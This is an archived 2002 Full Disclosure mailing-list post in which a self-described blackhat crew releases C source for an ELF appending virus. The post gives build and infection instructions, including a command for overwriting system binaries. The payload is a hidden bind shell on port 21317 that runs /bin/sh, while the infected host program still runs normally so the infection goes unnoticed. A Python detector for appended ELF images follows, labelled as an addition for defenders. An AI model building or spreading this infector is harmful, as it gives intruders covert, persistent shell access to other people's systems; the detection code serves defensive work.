Full Disclosure mailing list archives
[ElectronicSouls] ELF warfare
From: es () hush com
Date: Fri, 29 Nov 2002 01:53:38 -0800
-----BEGIN PGP SIGNED MESSAGE-----

Pioneered by silvio, perfected by Electronic Souls...

/*
 -----------------------------------------------------------
 [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW]
 ------------------- DO NOT DISTRIBUTE ! -------------------
 -----------------------------------------------------------

 [ E l e c t r o n i c S o u l s ]

 [Invader] - append ELF infect0r - update of the underworld ELF Parasite
 (C) BrainStorm - 01-2002

 -----------------------------------------------------------

 Information :
 +++++++++++++

 This ELF Infector uses the appendage infection tekneeq!
 that means two executables are appended together.
 The payload inside this parasite opens a port shell on the
 infected machine as the user who executed it.

 -----------------------------------------------------------

 to get it working :
 +++++++++++++++++++

 compile the code, then get the file size and change the define
 in the code, now recompile and we are done ;)

 example :

 i wrote a quick program that just prints a msg and shows the date
 so i can test the infection:

 [root@BrainMachine x]# ./blah
 im a test prog that gets infected :>
 Sam Jan 5 14:22:43 CET 2002
 [root@BrainMachine x]#

 that's how it looks like before the infection and after it, since the
 parasite extracts the host to a temp file and executes it, so you
 won't notice the infection unless you added some printf()s

 from another term:

 [root@BrainMachine client]# telnet localhost 21317
 Trying 127.0.0.1...
 Connected to brainmachine.electronicsouls.org.
 Escape character is '^]'.
 uname -a;
 Linux BrainMachine.ElectronicSouls.org 2.2.17-14 #1 Wed Feb 14 13:51:00 CET 2001 i686 unknown
 : command not found
 id;
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 : command not found

 ..now ph34r this ;)

 -----------------------------------------------------------

 to infect a binary :
 ++++++++++++++++++++

 cat /bin/binary >> para: mv para /bin/binary

 if binary gets executed it opens up a portshell ;)

 -----------------------------------------------------------

 special thanks to :
 +++++++++++++++++++

 ghQst and SectorX for making me interested in ELF infection
 and for being there for me since back in the days =) !
 and PhaNtoM for providing me with that very small portshell code !

 shouts go out to all ElectronicSouls members - j00 r0ck =)

 -----------------------------------------------------------
 [ElectronicSouls] - Immortal Blackhat since 1995 ;)
 -----------------------------------------------------------
*/

/* the fearsome t e k n e e q z start here ! */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PARASIZE 18018        /* dont forget to change me ! */
#define TEMP     ".para.tmp"  /* tmp file */
#define KILL(X)  exit(1)      /* we dont want to die.. */

int soc,cli;
struct sockaddr_in serv_addr;

int main(int argc, char *argv[], char *envp[])
{
    int input, output, lenght;
    char *dope;
    struct stat stat;

    if(fork()==0) /* start of the portshell */
    {
        serv_addr.sin_family=2;
        serv_addr.sin_addr.s_addr=0;
        serv_addr.sin_port=(0x4553);
        soc=socket(2,1,6);
        bind(soc,(struct sockaddr *)&serv_addr,0x10);
        listen(soc,1);
        cli=accept(soc,0,0);
        dup2(cli,0);
        dup2(cli,1);
        dup2(cli,2);
        execl("/bin/sh","sh",0);
    }

    input = open("/proc/self/exe", O_RDONLY);
    if (input < 0) KILL("open(input)");
    if (fstat(input, &stat) < 0) KILL("fstat");

    lenght = stat.st_size - PARASIZE;
    dope = malloc(lenght);
    if (dope == NULL) KILL("malloc");

    if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE) KILL("lseek(input)");
    if (read(input, dope, lenght) != lenght) KILL("read(input)");
    close(input);

    output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);
    if (output < 0) KILL("open(output)");
    if (write(output, dope, lenght) != lenght) KILL("write(output)");

    free(dope);
    close(output);

    exit(execve(TEMP, argv, envp));
}

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Healthy, wealthy, and wise."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nO18MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltkLoAoJgfB4HOklr/
Ezj3HsyHG0OtsGcIAKCgY/ggjGC+mD820NIEF92UMLfgLg==
=ooII
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
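
Added example, not part of the original post or its author's code: a defender-side check for the file layout the post describes, in which a second ELF image is stored in the same file after the end of the first. The names elf_end, find_appended_elf and sample_elf64 are hypothetical, and sample_elf64 only builds constructed test images.

```python
import struct

ELF_MAGIC = b"\x7fELF"
SHT_NOBITS = 8  # section type that occupies no bytes in the file
IDENT_OK = {bytes((c, d, 1)) for c in (1, 2) for d in (1, 2)}  # class, data, version

def elf_end(data: bytes) -> int:
    """Offset just past the last byte the first ELF image's headers account for."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    en = "<" if data[5] == 1 else ">"
    w = "Q" if is64 else "I"
    phoff, shoff = struct.unpack_from(en + w + w, data, 0x20 if is64 else 0x1C)
    phentsize, phnum, shentsize, shnum = struct.unpack_from(
        en + "4H", data, 0x36 if is64 else 0x2A)
    # A table offset only counts when the table has entries.
    end = max(64 if is64 else 52, phnum and phoff + phnum * phentsize,
              shnum and shoff + shnum * shentsize)
    for i in range(phnum):  # segments: p_offset + p_filesz
        base = phoff + i * phentsize
        (off,) = struct.unpack_from(en + w, data, base + (8 if is64 else 4))
        (filesz,) = struct.unpack_from(en + w, data, base + (32 if is64 else 16))
        end = max(end, off + filesz)
    for i in range(shnum):  # sections: sh_offset + sh_size, skipping .bss-style ones
        base = shoff + i * shentsize
        (sh_type,) = struct.unpack_from(en + "I", data, base + 4)
        off, size = struct.unpack_from(en + w + w, data, base + (24 if is64 else 16))
        if sh_type != SHT_NOBITS:
            end = max(end, off + size)
    return end

def find_appended_elf(data: bytes):
    """Offset of a second ELF header stored past the first image's end, else None."""
    try:
        pos = data.find(ELF_MAGIC, elf_end(data))
    except (ValueError, struct.error, IndexError):  # not ELF or malformed headers
        return None
    while pos != -1 and data[pos + 4:pos + 7] not in IDENT_OK:
        pos = data.find(ELF_MAGIC, pos + 1)
    return None if pos == -1 else pos

def sample_elf64(size: int) -> bytes:
    """Constructed input: ELF64 LE header plus one PT_LOAD spanning `size` bytes."""
    ehdr = ELF_MAGIC + bytes((2, 1, 1)) + bytes(9) + struct.pack(
        "<HHIQQQIHHHHHH", 2, 62, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", 1, 5, 0, 0, 0, size, size, 0x1000)
    return (ehdr + phdr).ljust(size, b"\0")
```

Run find_appended_elf over the bytes of each executable on a host (for example open(path, "rb").read()). A hit on a system binary is also a reason to look for the .para.tmp drop file and a listener on port 21317, both shown in the post.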